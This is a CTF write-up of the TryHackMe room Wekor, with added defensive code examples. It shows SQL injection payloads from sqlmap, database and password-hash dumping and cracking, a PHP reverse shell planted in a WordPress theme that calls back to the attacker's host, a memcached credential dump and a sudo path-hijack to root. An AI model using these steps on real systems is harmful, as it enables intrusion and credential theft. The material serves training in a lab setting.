TryHackMe Wekor Writeup

TryHackMe: Wekor, created by @ustoun0
The creator gives us many hints in this room, starting with the room description, the notes and the flag hints.
Room description:
CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services
Notes:
Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions… It’s okay to be confused in some parts of the box. Just a quick note, Please use the domain : “wekor.thm” as it could be useful later on in the box
Flag hints:
What is the user flag?
Hint: Look at what ports are open
What is the root flag?
Hint: Sudo -l
Let’s get down to business, shall we?
Before starting, add the wekor.thm domain to /etc/hosts:
echo "[IP] wekor.thm" | sudo tee -a /etc/hosts
Enumeration
sudo nmap -v -sS -sV -T4 --open -Pn -p- wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are 2 open ports: port 22 for SSH and port 80 for the Apache web server.
I tried to access FTP with the anonymous account, but the anonymous account was disabled.
Retrieve the web server's start page.
curl -v http://wekor.thm/
* Trying 10.10.17.203:80...
* Connected to wekor.thm (10.10.17.203) port 80 (#0)
> GET / HTTP/1.1
> Host: wekor.thm
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 08 Mar 2021 20:51:10 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Sun, 12 Jul 2020 00:29:54 GMT
< ETag: "17-5aa33ac47e480"
< Accept-Ranges: bytes
< Content-Length: 23
< Content-Type: text/html
<
Welcome Internet User!
* Connection #0 to host wekor.thm left intact
Exploring the site
feroxbuster -q -u http://wekor.thm -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -x php,html,txt
200 10l 20w 188c http://wekor.thm/robots.txt
200 7l 31w 190c http://wekor.thm/comingreallysoon/index.html
200 1l 3w 23c http://wekor.thm/index.html
Let’s check what we found.
curl http://wekor.thm/comingreallysoon/index.html
Welcome Dear Client!
We've setup our latest website on /it-next, Please go check it out!
If you have any comments or suggestions, please tweet them to @faketwitteraccount!
Thanks a lot !
* Connection #0 to host wekor.thm left intact
curl http://wekor.thm/robots.txt
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
Opening /it-next in the browser.

What do we have at http://wekor.thm/it-next? It looks like an HTML template, but the internal links are PHP pages.
Maybe the SQLi from the room description is hidden somewhere here.
I spent many hours fuzzing directories, but the rabbit hole was always near.
SQLMap exploration
sqlmap -u http://wekor.thm/it-next --batch --dbms=mysql --risk 3 --crawl=4 --forms
After some time SQLMap shows that a SQL injection vulnerability has been detected against ‘wekor.thm’, as below.
POST http://wekor.thm/it-next/it_cart.php
POST data: coupon_code=&apply_coupon=Apply%20Coupon
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: coupon_code=&apply_coupon=Apply%20Coupon] (Warning: blank fields detected): coupon_code=&apply_coupon=Apply Coupon
do you want to fill blank fields with random values? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: coupon_code (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: coupon_code=JlIv' OR NOT 7432=7432#&apply_coupon=Apply Coupon
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: coupon_code=JlIv' AND GTID_SUBSET(CONCAT(0x71716b7671,(SELECT (ELT(9501=9501,1))),0x7170706271),9501)-- vrEO&apply_coupon=Apply Coupon
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: coupon_code=JlIv' AND (SELECT 6261 FROM (SELECT(SLEEP(5)))PtyT)-- HgoQ&apply_coupon=Apply Coupon
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: coupon_code=JlIv' UNION ALL SELECT NULL,CONCAT(0x71716b7671,0x7a4942504f474f495461514f43644c4a6e566c644a695852787450507557784a61796c5356497a6d,0x7170706271),NULL#&apply_coupon=Apply Coupon
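The injection sqlmap found is the classic string-quoted parameter pasted into the query text. The following is an added example (not code from the room or from it_cart.php, whose source is not on the page): a hypothetical coupon lookup in its vulnerable form beside a parameterised one, run against an in-memory SQLite copy of the valid_coupons table dumped later in this writeup. The boolean-based payload pair mirrors the one sqlmap reported, with the MySQL "#" comment swapped for SQLite's "--".

```python
import sqlite3

# Constructed stand-in for the coupons.valid_coupons table dumped in the
# writeup. The real it_cart.php query is not on the page; the string-quoted
# concatenation below is a hypothetical reconstruction of the bug class.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE valid_coupons (id INTEGER, coupon TEXT, expire_date TEXT)")
    conn.execute("INSERT INTO valid_coupons VALUES (1, '12345', 'doesnotexpire')")
    conn.commit()
    return conn

def lookup_coupon_vulnerable(conn, coupon_code):
    # User input pasted straight into the SQL text: a quote in the input
    # closes the string literal and the rest of the input becomes SQL.
    sql = f"SELECT id FROM valid_coupons WHERE coupon = '{coupon_code}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_coupon_safe(conn, coupon_code):
    # Parameterised query: the value travels separately from the statement,
    # so quotes or comment markers in it are just characters to compare.
    sql = "SELECT id FROM valid_coupons WHERE coupon = ?"
    return [row[0] for row in conn.execute(sql, (coupon_code,))]

# Boolean-based pair in the style sqlmap reported. MySQL accepted the "#"
# line comment; SQLite only knows "--", so the tail is adapted here.
TRUE_PAYLOAD = "JlIv' OR NOT 7432=7433 -- "
FALSE_PAYLOAD = "JlIv' OR NOT 7432=7432 -- "

def compare(conn):
    """Run the same inputs through both lookups. The row-count difference
    between the two payloads is exactly what a blind-SQLi scanner measures;
    the parameterised version shows no difference at all."""
    inputs = {"valid": "12345", "true_payload": TRUE_PAYLOAD, "false_payload": FALSE_PAYLOAD}
    return {
        name: {"vulnerable": lookup_coupon_vulnerable(conn, value),
               "safe": lookup_coupon_safe(conn, value)}
        for name, value in inputs.items()
    }

if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(f"{name:14s} vulnerable={result['vulnerable']} safe={result['safe']}")
```

With the vulnerable lookup the "true" payload returns the coupon row even though the coupon code JlIv does not exist, while the "false" payload returns nothing; the parameterised lookup returns nothing for either, because the whole string is compared as a coupon code.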
Now let’s look at what databases we have.
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" --dbs
[...]
[16:23:33] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[16:23:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/wekor.thm'
[*] ending @ 16:23:33 /2021-03-08/
Two databases are of interest: coupons and wordpress. Let’s dump those databases and see if we can find some credentials, and where WordPress is installed.
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables
[...]
Database: coupons
[1 table]
+---------------+
| valid_coupons |
+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D coupons --tables --dump
[...]
Table: valid_coupons
[1 entry]
+----+--------+---------------+
| id | coupon | expire_date |
+----+--------+---------------+
| 1 | 12345 | doesnotexpire |
+----+--------+---------------+
[...]
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress --tables
[...]
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
sqlmap -u http://wekor.thm/it-next/it_cart.php --data="coupon_code=&apply_coupon=Apply%20Coupon" -D wordpress -T wp_users --dump
[...]
Database: wordpress
Table: wp_users
[4 entries]
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1 | http://site.wekor.thm/wordpress | $P$____________HASH_______31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | <blank> |
| 5743 | http://jeffrey.com | $P$_______HASH________j10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com | $P$B_________HASH________SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | <blank> |
| 5873 | http://eagle.com | $P$B________HASH_______6QY/ | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | <blank> |
+------+---------------------------------+------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
So now we have credentials and the WordPress address, site.wekor.thm.
Let’s add site.wekor.thm to the /etc/hosts file and see how it appears.
echo "[IP] site.wekor.thm" | sudo tee -a /etc/hosts

We already have some credentials (the password hashes); the next step is to crack them with john and the rockyou wordlist.
cat hashes
admin:$P$____________HASH_______31B.
wp_jeffrey:$P$_______HASH________j10
wp_yura:$P$B_________HASH________SV/
wp_eagle:$P$B________HASH_______6QY/
john --wordlist=/usr/share/wordlists/rockyou.txt ./hashes
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Remaining 1 password hash
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:26 DONE (2021-03-08 18:25) 0g/s 28315p/s 28315c/s 28315C/s !!!@@@!!!..*7¡Vamos!
Session completed
After a while, john broke three hashes.
john ./hashes --show
wp_jeffrey:PASSWORD_TEXT
wp_yura:PASSWORD_TEXT
wp_eagle:PASSWORD_TEXT
3 password hashes cracked, 1 left
Yura is the WordPress admin. The next step is to install the reverse shell inside WordPress.
Change the host IP in the file /usr/share/webshells/php/php-reverse-shell.php to your VPN IP.
After that, open the WordPress “Theme Editor”, select the “404 Template” file, replace its content with the reverse shell file and save.
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Open a local netcat listener and make a request to establish the connection.
In one terminal window, start netcat:
nc -nvlp 1234
In another terminal, request a page that does not exist:
curl http://site.wekor.thm/wordpress/index.php/xyz
Now we have a shell session.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ groups
www-data
Which users do we have?
www-data@osboxes:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
Orka:x:1001:1001::/home/Orka:/bin/bash
Only Orka and root have a login shell.
Looking at the listening ports, you can find something running on port 11211.
netstat -lptu
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:mysql *:* LISTEN -
tcp 0 0 localhost:11211 *:* LISTEN -
tcp 0 0 *:ssh *:* LISTEN -
tcp 0 0 localhost:ipp *:* LISTEN -
tcp 0 0 localhost:3010 *:* LISTEN -
tcp6 0 0 [::]:http [::]:* LISTEN -
tcp6 0 0 [::]:ssh [::]:* LISTEN -
tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN -
udp 0 0 *:ipp *:* -
udp 0 0 *:mdns *:* -
udp 0 0 *:43825 *:* -
udp 0 0 *:bootpc *:* -
udp6 0 0 [::]:mdns [::]:* -
udp6 0 0 [::]:50771 [::]:*
After searching on Google we discover that it is a memcached server. Some more searching and we have the command to dump the cached data.
/usr/share/memcached/scripts/memcached-tool localhost:11211 dump
Dumping memcache contents
Number of buckets: 1
Number of items : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
---->PASSWORD_TEXT<-----
add email 0 1615235112 14
Orka@wekor.thm
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka
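The dump above shows why a memcached instance reachable by any local process is a finding in itself: whatever the application caches is readable in clear text. As an added example (not part of the writeup), here is a small parser for the "add <key> <flags> <exptime> <bytes>" format memcached-tool prints, run over a constructed sample shaped like the dump above, that flags keys whose names suggest credentials. The sample password value is a made-up placeholder.

```python
import re

# Constructed sample in the format memcached-tool's "dump" mode prints:
# a header "add <key> <flags> <exptime> <bytes>" followed by the value.
# The password value is a made-up placeholder, not the box's real secret.
SAMPLE_DUMP = """\
Dumping memcache contents
Number of buckets: 1
Number of items : 5
Dumping bucket 1 - 5 total items
add salary 0 1615235112 8
$100,000
add password 0 1615235112 15
hunter2-example
add email 0 1615235112 14
Orka@wekor.thm
add id 0 1615235112 4
3476
add username 0 1615235112 4
Orka
"""

HEADER = re.compile(r"^add (\S+) (\d+) (\d+) (\d+)$")

# Key-name fragments that usually mean a secret is being cached.
SENSITIVE_KEY_WORDS = ("pass", "secret", "token", "credential", "session")

def parse_memcached_dump(text):
    """Parse a dump into dicts: key, flags, exptime, declared length, value."""
    lines = text.splitlines()
    items = []
    i = 0
    while i < len(lines):
        m = HEADER.match(lines[i])
        if not m:
            i += 1              # preamble and bucket lines carry no items
            continue
        key, flags, exptime, length = m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
        # A value may contain newlines, so keep consuming lines until the
        # declared byte count is reached instead of assuming a single line.
        value_lines = []
        i += 1
        while i < len(lines):
            value_lines.append(lines[i])
            i += 1
            if len("\n".join(value_lines).encode()) >= length:
                break
        value = "\n".join(value_lines)
        items.append({"key": key, "flags": flags, "exptime": exptime,
                      "length": length, "value": value,
                      "length_ok": len(value.encode()) == length})
    return items

def find_sensitive(items):
    """Return the keys whose names look like they hold credentials."""
    return [it["key"] for it in items
            if any(word in it["key"].lower() for word in SENSITIVE_KEY_WORDS)]

if __name__ == "__main__":
    parsed = parse_memcached_dump(SAMPLE_DUMP)
    for it in parsed:
        print(f"{it['key']:10s} {it['length']:4d} bytes  ok={it['length_ok']}")
    print("credential-like keys:", find_sensitive(parsed))
```

The length check matters because memcached-tool writes the raw bytes it received; a mismatch between the declared size and what was parsed means a multi-line value was split or the dump was truncated.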
OK, now we have Orka’s password.
As Orka, what can you do?
sudo -l
[sudo] password for Orka:
Matching Defaults entries for Orka on osboxes:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Orka may run the following commands on osboxes:
(root) /home/Orka/Desktop/bitcoin
Orka@osboxes:/tmp$ ls -lha /home/Orka/Desktop/bitcoin
-rwxr-xr-x 1 root root 7.6K Jan 23 15:23 /home/Orka/Desktop/bitcoin
ls -la /home/Orka/Desktop/
total 2176
drwxrwxr-x 2 Orka Orka 4096 Mar 8 17:52 .
drwxr-xr-- 19 Orka Orka 4096 Mar 8 17:49 ..
-rwxr-xr-x 1 Orka Orka 1109564 Mar 8 17:52 bitcoin
You can execute bitcoin with sudo. You can’t change bitcoin itself, but you can change the Desktop folder. Let’s replace bitcoin with bash and get root.
Orka@osboxes:/tmp$ cd /home/Orka/
Orka@osboxes:~$ mv Desktop d
Orka@osboxes:~$ mkdir Desktop
Orka@osboxes:~$ cp /bin/bash ./Desktop/bitcoin
Orka@osboxes:~$ sudo /home/Orka/Desktop/bitcoin
root@osboxes:~# cat /root/root.txt
FLAG_TEXT
root@osboxes:~# cat /home/Orka/user.txt
FLAG_TEXT
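The root step works because the sudo rule points at a binary inside a directory Orka owns: the binary is root-owned and read-only, but its parent can be renamed and recreated. The following is an added example (not from the writeup) of the check an administrator would run before granting such a rule: walk from the command up to / and report every component the user can write, using only the POSIX mode bits. The filesystem snapshot is constructed from the ls output above (bitcoin as root-owned, before it was replaced); the modes of / and /home are assumed defaults, and Orka's uid/gid 1001 comes from /etc/passwd.

```python
import os
import stat
from collections import namedtuple
from pathlib import PurePosixPath

Entry = namedtuple("Entry", "st_mode st_uid st_gid")

# Constructed snapshot of the relevant paths, taken from the ls output in the
# writeup (bitcoin as root-owned, before it was replaced). Orka is uid/gid
# 1001 per /etc/passwd; the modes of / and /home are assumed defaults.
SNAPSHOT = {
    "/":                          Entry(stat.S_IFDIR | 0o755, 0, 0),
    "/home":                      Entry(stat.S_IFDIR | 0o755, 0, 0),
    "/home/Orka":                 Entry(stat.S_IFDIR | 0o754, 1001, 1001),  # drwxr-xr--
    "/home/Orka/Desktop":         Entry(stat.S_IFDIR | 0o775, 1001, 1001),  # drwxrwxr-x
    "/home/Orka/Desktop/bitcoin": Entry(stat.S_IFREG | 0o755, 0, 0),        # -rwxr-xr-x root
}

def user_can_write(st, uid, gids):
    """POSIX mode-bit check only; ACLs and capabilities are not considered."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def writable_components(command_path, uid, gids, stat_fn=os.stat):
    """Return the command file and every ancestor directory the user can write.

    A writable ancestor is enough: the directory can be renamed and recreated
    with a user-controlled file at the same path, which is how bitcoin was
    swapped for bash above. A sticky-bit directory not owned by the user is
    excluded, since other users' entries there cannot be renamed."""
    path = PurePosixPath(command_path)
    findings = []
    for p in [path, *path.parents]:
        try:
            st = stat_fn(str(p))
        except (FileNotFoundError, KeyError):
            continue
        sticky_locked = (stat.S_ISDIR(st.st_mode)
                         and bool(st.st_mode & stat.S_ISVTX)
                         and st.st_uid != uid)
        if user_can_write(st, uid, gids) and not sticky_locked:
            findings.append(str(p))
    return findings

def audit_sudo_rules(rules, uid, gids, stat_fn=os.stat):
    """rules: the command paths a user may run (as listed by `sudo -l`).
    Returns a map from command to the components that user could replace."""
    return {cmd: writable_components(cmd, uid, gids, stat_fn) for cmd in rules}

if __name__ == "__main__":
    # Pass stat_fn=os.stat (the default) to audit a live system instead.
    report = audit_sudo_rules(["/home/Orka/Desktop/bitcoin"], 1001, {1001}, SNAPSHOT.__getitem__)
    for cmd, weak in report.items():
        print(cmd, "-> OK" if not weak else f"-> user-writable components: {weak}")
```

For the rule on this box the report lists both /home/Orka/Desktop and /home/Orka, so the fix is to keep sudo-able binaries under a root-owned path such as /usr/local/sbin rather than inside a home directory.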